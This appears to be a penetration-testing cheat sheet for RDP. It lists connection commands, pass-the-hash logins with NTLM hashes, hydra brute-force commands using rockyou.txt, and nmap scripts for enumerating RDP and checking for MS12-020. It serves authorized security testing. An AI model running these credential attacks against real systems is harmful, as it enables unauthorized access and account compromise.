Disclaimer: This material is provided solely for educational purposes.
You are fully responsible for how
you use the information.
We
do not encourage any kind of illegal or harmful activity.
Introduction
RDP (Remote Desktop Protocol) is a Microsoft-developed protocol that allows users to connect and interact with another computer remotely. It provides a graphical interface, transmitting the user's display and inputs securely over a network. RDP is commonly used for remote computer management, IT support, and accessing work applications from afar. It's primarily used with Windows but is available for other operating systems as well.
RDP Access and Authentication Commands
| Command |
Description |
rdesktop -u [USERNAME] -p [PASSWORD] [TARGET-IP] |
Starts a basic RDP connection, enabling desktop access with login credentials. |
xfreerdp /v:[TARGET-IP] /u:'USERNAME' /p:'PASSWORD' /drive:[NAME],[PATH] |
Establishes an RDP session with resource redirection, allowing local drives to be accessible during the remote session. Useful for transferring files between the host and the client. |
xfreerdp /u:'USERNAME' /d:[DOMAIN] /pth:[NTLM] /v:[SERVER].[DOMAIN].local |
Connects to an RDP session using Pass-the-Hash authentication. This method uses NTLM hashes instead of plain text passwords. |
Tips & tricks
You can log into the RDP server without a password to gather information, such as the Windows version, from the login page.
FreeRDP Connection Scenarios
| Command |
Scenario |
xfreerdp /u:[USERNAME] /p:[PASSWORD] /v:[TARGET-IP] /sound:sys:alsa |
Connect to a FreeRDP server and activate audio output redirection using sys:alsa device |
xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /dynamic-resolution |
Connect to a FreeRDP server with dynamic resolution |
xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] +clipboard |
Connect to a FreeRDP server with clipboard redirection |
xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /cert:ignore |
Connect to a FreeRDP server ignoring any certificate checks |
xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /drive:path/to/directory,share_name |
Connect to a FreeRDP server with a shared directory |
Brute-Forcing RDP Credentials
| Scenario |
Command |
| Unknown User |
hydra -L user.txt -p "Password" -f rdp://[TARGET-IP] |
| Unknown Password |
hydra -l user -P /opt/rockyou.txt -f rdp://[TARGET-IP] |
| Unknown User and Password |
hydra -L user.txt -P /opt/rockyou.txt -f rdp://[TARGET-IP] |
Nmap NSE Scripts
| Command |
Description |
ls -la /usr/share/nmap/scripts \| grep "rdp" |
Lists available Nmap scripts that target RDP services, ideal for identifying potential security enhancements or vulnerabilities. |
nmap --script rdp-enum-encryption -p 3389 [IP_ADDRESS] |
Enumerates encryption methods supported by the RDP server, providing insights into the security level of the RDP connections. |
nmap --script rdp-vuln-ms12-020 -p 3389 [IP_ADDRESS] |
Checks for the notorious MS12-020 vulnerability, which if present, could allow unauthorized remote code execution on the RDP server. |